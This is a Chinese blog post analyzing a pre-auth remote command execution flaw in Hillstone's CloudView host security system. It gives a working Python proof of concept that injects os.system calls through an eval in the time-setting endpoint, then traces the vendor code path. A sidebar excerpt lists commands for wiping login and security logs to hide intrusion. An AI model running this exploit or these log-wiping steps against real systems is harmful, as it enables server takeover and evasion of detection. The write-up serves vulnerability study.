山石云鉴主机安全管理系统前台任意命令执行漏洞分析

最新推荐文章于 2024-05-17 00:00:22 发布
最新推荐文章于 2024-05-17 00:00:22 发布
阅读量929 收藏 16
点赞数 8
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackzer0/article/details/136377836
版权

山石云鉴主机安全管理系统前台任意命令执行

漏洞名称

山石网科云鉴存在前台任意命令执行漏洞

漏洞复现

POC

import requests
import urllib3

urllib3.disable_warnings()

base_url = ""
'''
HSVD-2023-0008
'''
def setSystemTimeAction(newcsrf,headers):
    url =  base_url + "/master/ajaxActions/setSystemTimeAction.php?token_csrf="+newcsrf
    proxies = {'https':'http://127.0.0.1:8080'}
    x = "param=os.system('whoami > /opt/var/majorsec/installation/master/runtime/img/config')"
    req2 = requests.post(url, data=x,headers=headers, verify=False)

'''
HSVD-2023-0005
'''
def getMessageSettingAction(newcsrf,header):
    proxies = {'https':'http://127.0.0.1:8080'}
    company_uuid = "aaa"
    platform_sel = "os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')"
    url = base_url + '/master/ajaxActions/getMessageSettingAction.php?token_csrf='+newcsrf+"&company_uuid="+company_uuid+"&platform_sel="+platform_sel
    req = requests.get(url, headers=header, verify=False)
    print(req.text)


def main():
    headers = {"Cookie": "PHPSESSID=emhpeXVhbg;",
           "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"
           }
    url = base_url + "/master/ajaxActions/getTokenAction.php"
    req = requests.post(url, verify=False, headers=headers)
    newcsrf = req.text.replace("\n", "")
    setSystemTimeAction(newcsrf,headers)
    reshell = requests.get(base_url + '/master/img/config',verify=False)
    print('---------------------cmd-------------------------')
    print(reshell.text)

if __name__ == '__main__':
    main()

漏洞分析

根据 poc 可知关键函数为 setSystemTimeAction,关键请求为 base_url + "/master/ajaxActions/setSystemTimeAction.php,post 请求的参数为 param=os.system('whoami > /opt/var/majorsec/installation/master/runtime/img/config')

先分析 setSystemTimeAction.php 文件如何处理 http 请求

master\runtime\ajaxActions\setSystemTimeAction.php

<?php 
include "../permission.php";
if(!isPermission('operator')){
    echo "F";
    return;
}else if(!verifyToken()){
    echo "F";
    return;
}
include_once "../includeUtils.php";
session_write_close();
$param= $_POST['param'];
$param=base64_encode($param);
$resp=setSysTime($param);
$resp = array("Status"=>$resp['status'], "Result"=>json_decode($resp['body']));
echo json_encode($resp,JSON_UNESCAPED_UNICODE);
?>

第 13、14行,将参数 x base64 编码后传递给 setSysTime 函数

function setSysTime($param){
    return handleEmptyResult(postCommand("set-mp-time|".$param));
}

setSysTime 中又调用了 postCommand

function postCommand($parameter){
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_POST, 1); // POST
    curl_setopt($ch, CURLOPT_POSTFIELDS, $parameter); // POST param
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); 
    $url = "http://".$GLOBALS['serverNm'].":8000/"; // URL
    writeLog('post param is '.$parameter, 2);
    writeLog('url is '.$url, 2);
    curl_setopt($ch, CURLOPT_URL,$url); 
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); 
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); 
    $headers = array(
        "Content-Length: ".strlen($parameter),
        "Content-Type: application/x-www-form-urlencoded"
    ); 
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); 
    $result = curl_exec ($ch); 
	writeLog('post api returns:'.$result, 2);
	$httpCode = curl_getinfo($ch,CURLINFO_HTTP_CODE);
	writeLog($url.' status:'.$httpCode, 2);
    writeLog($url.' get api returns:'.$result, 2);
    curl_close ($ch);
    return array("status"=>$httpCode, "body"=>$result);

}

postCommand 函数的主要功能是通过 curl 做 http post 请求链接 http://127.0.0.1:8000/

通过netstat -lntp查看监听 8000 端口进程的 pid,得知执行进程的命令

netstat -lntp
......

ps -p 2436 -o pid,ppid,cmd //
---------------------cmd-------------------------
  PID  PPID CMD
 2436     1 python /opt/var/majorsec/installation/base/runtime/bin/python /opt/var/majorsec/installation/base/scripts/service/yamin/main.py

下面分析 /opt/var/majorsec/installation/base/scripts/service/yamin/main.py 是如何处理 http 请求的

此文件是一个基于 Tornado 框架的 Web 服务程序,它提供了一个接收 POST 请求的接口

介绍 — Tornado 4.3 文档 (tornado-zh.readthedocs.io)

主要处理逻辑 CommandHandler post 如下

class CommandHandler (tornado.web.RequestHandler):
    # @gen.coroutine
    def post(self):
        try:
            logging.debug('\n'.join(
                '{0}:{1}'.format(k, v) for (k, v) in self.request.headers.get_all()
            ))
            logging.debug(self.request.body)

            command = self.request.body
            ret, msg = routeCommand(command, self)

            if ret and ret != "alreadySendToFrontEnd":
                self.write(msg)
                self.finish()
            elif not ret:
                logging.error(msg)
                raise Exception(msg)
        except Exception as e:
            logging.error("CommandHandler Exception: {}".format(e))
            raise tornado.web.HTTPError(400)

第 10、11 行将 http body 传递给了 routeCommand 处理

def routeCommand(commandline, handler):
    global conf
    if not commandline:
        return False, "Invalid command"

    if len(commandline) > 4096 or len(commandline) < 4:
        return False, "Invalid command"

    command, args = None, None
    try:
        l = commandline.split('|', 1)
        command, args = l[:2] if len(l) > 1 else (l[0], '')
    except Exception as e:
        return False, "Cannot parse {}:{}".format(commandline, e)

    stage = getStage()
    if command not in commands[stage]:
        return False, "Invalid command {0} at stage {1}".format(command, stage)
    if stage in (2, 3) and not initStore():
        return False, "Unavailable service"

    conf['server'] = handler
    try:
        command = command.replace('-', '_')
        return eval(command)(args=args.split('|'), conf=conf, store=store)
    except Exception as e:
        return False, e

routeCommand 功能为分割参数 commandline,将 | 之前的字符串赋值给 command,之后的赋值给 args,然后将 command 字符串中的- 替换为 _,最后通过 eval 执行此字符串

例如 commandline = "set-mp-time|base64_encode($param)",处理后 command = "set_mp_time",args = base64_encode($param)

下面分析 eval 执行的函数 set_mp_time(args) 的功能,位于 installation\base\scripts\service\yamin\set_command.py

def set_mp_time(**kwargs):
    args = kwargs['args']

    try:
        time_config_keys = ["config", "zone", "datetime", "ntp_server_1", "ntp_server_2"]
        try:
            conf = eval(base64.b64decode(args[0]))
            logging.info("get time config request: {}".format(conf))
            for config_key in time_config_keys:
                if config_key not in conf:
                    raise Exception("not found key: {}".format(config_key))
        except Exception as e:
            return True, setResult(1, errmsg="unexpected args: {}".format(e))

        if not conf["zone"] == "" and not conf["zone"] == get_my_timezone():
            logging.info("start to set timezone: {}".format(conf["zone"]))
            logging.debug("timedatectl set-timezone {0}".format(conf["zone"]))
            sys_command.run_sys_cmd("timedatectl set-timezone {0}".format(conf["zone"]))
            php_conf_file = "/opt/etc/php.d/majorsec.ini"
            if not os.access(php_conf_file, os.R_OK):
                php_conf_file = "/opt/php/etc/php.d/majorsec.ini"
            zone_setting = "date.timezone = {}".format(conf["zone"])
            zone_setting = zone_setting.replace('/', '\/')
            with open(php_conf_file, 'r') as php_conf:
                php_zone = php_conf.readlines()[0].strip().replace('/', '\/')
            logging.debug("sed -i -r 's/{0}/{1}/g' {2}".format(php_zone, zone_setting, php_conf_file))
            sys_command.run_sys_cmd("sed -i -r 's/{0}/{1}/g' {2}".format(php_zone, zone_setting, php_conf_file))

        if conf["config"] == "local":
            if conf['datetime']:
                try:
                    date = conf['datetime'].split(" ")[0]
                    Time = conf['datetime'].split(" ")[1]
                except Exception:
                    raise Exception("parse datetime failed: {}".format(conf["datetime"]))

                logging.debug("timedatectl set-ntp false")
                sys_command.run_sys_cmd("timedatectl set-ntp false")
                logging.debug("stop and disable chronyd service")
                sys_command.run_sys_cmd("systemctl stop chronyd.service")
                sys_command.run_sys_cmd("systemctl disable chronyd.service")
                logging.debug('timedatectl set-time "{0} {1}"'.format(date, Time))
                sys_command.run_sys_cmd('timedatectl set-time "{0} {1}"'.format(date, Time))
                sys_command.run_sys_cmd("clock -w")
                time.sleep(1)
        else:
            logging.debug("enable and start chronyd service")
            sys_command.run_sys_cmd("systemctl enable chronyd.service")
            p = ConfigParser.ConfigParser()
            p.read(base_ini_path)
            all_sections = p.sections()
            if 'ntp' not in all_sections:
                p.add_section('ntp')
            p.set('ntp', 'server1', conf['ntp_server_1'])
            p.set('ntp', 'server2', conf['ntp_server_2'])
            p.write(open(base_ini_path, 'w'))
            sync_setting_to_chronyd()
            sys_command.run_sys_cmd("chronyc -a makestep")
        return True, setResult(0, '')

    except Exception as e:
        sys_command.run_sys_cmd("rm -f /opt/tmp/nginx/.first_config_running")
        logging.error("set time config exception: {}".format(e))
        return True, setResult(1, errmsg="{}".format(e))

关键代码为第 7 行 conf = eval(base64.b64decode(args[0])),通过 eval 执行了 base64 解码的参数

类似功能的简化代码如下

import os

def set_mp_time(args):
    eval(args[0])

cmd = "set_mp_time"
args = "os.system('whoami')"
eval(cmd)(args = args.split('|'))

其中 args 是由 $param= $_POST['param']; 传递来的,所以 payload 为 param=os.system('whoami > /opt/var/majorsec/installation/master/runtime/img/config') ,由于没有回显,所以要将命令执行结果重定向到可以访问的文件中,最后通过访问 http://url/master/img/config 查看命令结果

参考链接

安全公告-山石网科云鉴存在前台任意命令执行漏洞 - 山石网科 (hillstonenet.com.cn)

POC/山石网科云鉴存在前台任意命令执行漏洞.md at main · wy876/POC (github.com)

BabaXD
关注
  • 8
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
山石网科云鉴安全管理系统setsystemtimeaction rce漏洞(含批量验证poc)
weixin_43567873的博客
04-28 236
山石网科云鉴安全管理系统setsystemtimeaction rce漏洞(含批量验证poc)
0day漏洞-山石网科SQL注入漏洞
weixin_43167326的博客
03-28 718
云工作负载由于业务驱动发展到今天,传统的安全风险问题仍然存在,同时由于云原生技术的引入,新的安全风险也在不断产生,云原生架构相关的安全风险也需要被重点考虑,这就给企业的云计算环境带来了更多的安全挑战。
山石网科云鉴安全管理系统 setsystemtimeaction rce漏洞
qq_39894062的博客
04-15 885
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。
主机被挖矿解决方法
qq_38472451的博客
08-22 3172
主机被挖矿解决方法
web安全之登录框渗透骚姿势,新思路
qq_47289634的博客
05-10 576
越权漏洞的挖掘大部分是通过对比两个用户的请求包以及响应包,来观察不同之处,有的时候替换一下响应包就直接越权,其中特别要关注的是uid,这里在挖掘逻辑漏洞和越权漏洞时建议使用burp中的compare模块进行两个数据包的比对,非常直观。width=500&height=100导致可以随意更改大小,配合脚本批量请求,很容易就会把带宽占满,造成dos攻击。不管漏洞挖掘还是挖SRC,登录框都是重点关注对象,什么漏洞都有可能出现,登录框也是框,见框就插就对了,说不定会有奇效。看到登录框,输入信息后,抓包。
Web安全:企业如何抵御常见的网络攻击?
m0_66326520的博客
05-16 636
针对网站的攻击有多种形式,攻击者既可以是业余黑客,也会是协同作战的职业黑客团伙。最关键的一条建议,就是在创建或运营网站时不要跳过安全功能,因为跳过安全设置可能会造成严重后果。虽然不可能完全消除网站攻击风险,但你至少可以缓解遭攻击的可能性和攻击后果的严重性。遭受攻击后,不仅需要及时的响应处置还需要避免同类事件的发生,因此事后的复盘分析尤为重要,做好安全防护才是最高效的网络攻击解决方案。
网络安全(黑客)—-2024自学手册
xv7676的博客
05-06 2121
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
威胁建模的艺术:了解网络安全风险的另一面
西数科技-专注于数据恢复与司法鉴定
05-13 512
从广义上讲,威胁建模涉及从日常的安全工作中退一步,以了解企业的系统、评估网络和数字资源、识别威胁环境中的漏洞并优先考虑涵盖保护、响应、补救和恢复的计划。TRIKE是一种基于知识库的开源建模方法,通过收集、整理和分析威胁情报,构建一个全面的知识库,主要包括威胁漏洞、攻击向量等信息,来帮助组织理解和管理其面临的威胁和风险。然而,这种方式目前必须要改变。组织应该通过定期审查来更新和改进威胁模型,确保它们准确地反映当前的威胁环境和系统本身的任何变化,从而保持一个强大的、响应性强的安全状态,以适应不断涌现的新挑战。
什么是蜜罐,在当前网络安全形势下,蜜罐能提供哪些帮助
dexunyun的博客
05-16 772
要建立一个成功的蜜罐系统,需要经过详细的规划和设计,并且与专业的安全团队合作,德迅云安全会根据用户的需求和威胁情报,选择合适的蜜罐类型和部署位置。而蜜罐就是其中重要的举措,旨在提供额外的安全层。蜜罐可以记录攻击者的工具、技术和过程信息,通过分析攻击者的行为、技术和策略,可以获取关于新的攻击向量、漏洞和威胁情报的重要信息。低交互蜜罐:低交互蜜罐只模拟了系统的一部分功能,通常只包括网络服务和部分应用程序,为攻击者提供简单的交互,配置简单,容易部署,但受限于交互能力,可能无法捕获高价值的攻击。
【网络安全】系统日志清理的操作步骤
weixin_43822401的博客
05-16 177
如果访问了某些服务,比如说通过 apache 服务获得一个 shell,你还需要清理 apache 服务的访问日。删除登录成功记录:echo > /var/log/wtmp (此时执行 last 命令就会发现没有记录)仅本地清理,如果目标服务存在日志服务器的话,所有日志还会被保留。这里仅清理系统相关日志,3. 删除日志记录:echo > /var/log/secure。删除登录失败记录:echo > /var/log/btmp。删除系统日志目录下的一些日志文件。1. 访问失败的日志。2. 访问成功的日志。
《2024网络安全报告》中文版
2301_76786857的博客
05-10 529
Check Point发布了《2024 年网络安全报告》,Check Point Research 对网络攻击数据(包括所有地区和全球的统计数据)进行了全面分析,揭示了不断变化的网络威胁形势。● 勒索软件攻击形势严重恶化,传统勒索软件和更难应对的大规模勒索软件攻击均大幅增长。● 去年,全球 1/10 的机构遭遇勒索软件攻击尝试,比上一年激增 33%● 零售/批发相关企业每周所遇攻击次数骤增。
网络安全好吗
weixin_51347473的博客
05-13 212
2. **维护企业运营**:对于企业来说,网络安全可以防止商业机密泄露,保护企业声誉,避免因数据泄露或网络攻击导致的经济损失。7. **促进创新**:在一个安全的环境中,企业和个人更有可能进行创新和尝试新技术,因为他们知道他们的创意和投资是受到保护的。1. **保护个人信息**:网络安全可以帮助保护用户的个人信息,如身份信息、财务数据和通信内容,防止它们被黑客窃取和滥用。6. **保护知识产权**:网络安全可以帮助企业和个人保护其知识产权,如专利、商标和版权作品,防止它们被盗窃或非法使用。
web安全学习笔记(17)
m0_58875569的博客
05-16 1002
记一下第29-30节课的内容。任意文件下载/读取漏洞;CSRF漏洞的挖掘与防护
CTF网络安全大赛简单web题目:eval
最新发布
Pythonit教程网
05-17 607
(错误控制运算符)等可能引发安全问题的函数。这个PHP脚本有几个关键部分,但首先,它是不安全的,因为使用了。红客网:blog.hongkewang.cn。只需要在web的url后面加上参数“题目来源于:bugku。一道简单web的题目。
网络安全(黑客技术)—2024自学手册
dexi113的博客
05-10 1922
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!
探索美国动态IP池:技术赋能下的网络安全新篇章
superLxhao的博客
05-13 340
美国动态IP池,简单来说,就是位于美国地区的一组可动态分配的IP地址集合。这些IP地址由专业的服务提供商管理,用户可以根据需要随时请求和释放IP地址,实现快速、灵活的网络接入。与传统的固定IP地址相比,动态IP池具有更高的灵活性和安全性。随着网络技术的不断发展和应用场景的日益丰富,美国动态IP池将在网络安全领域发挥越来越重要的作用。同时,我们也需要不断提高网络安全意识,共同构建一个安全、可信的网络空间。美国动态IP池作为一种新兴的网络技术,正逐渐走进人们的视野,为网络安全提供新的解决方案。
网络安全(黑客)自学启蒙
白帽子佳奇的博客
05-08 1589
当我们谈论网络安全时,我们正在讨论的是保护我们的在线空间,这是我们所有人的共享责任。网络安全涉及保护我们的信息,防止被未经授权的人访问、披露、破坏或修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值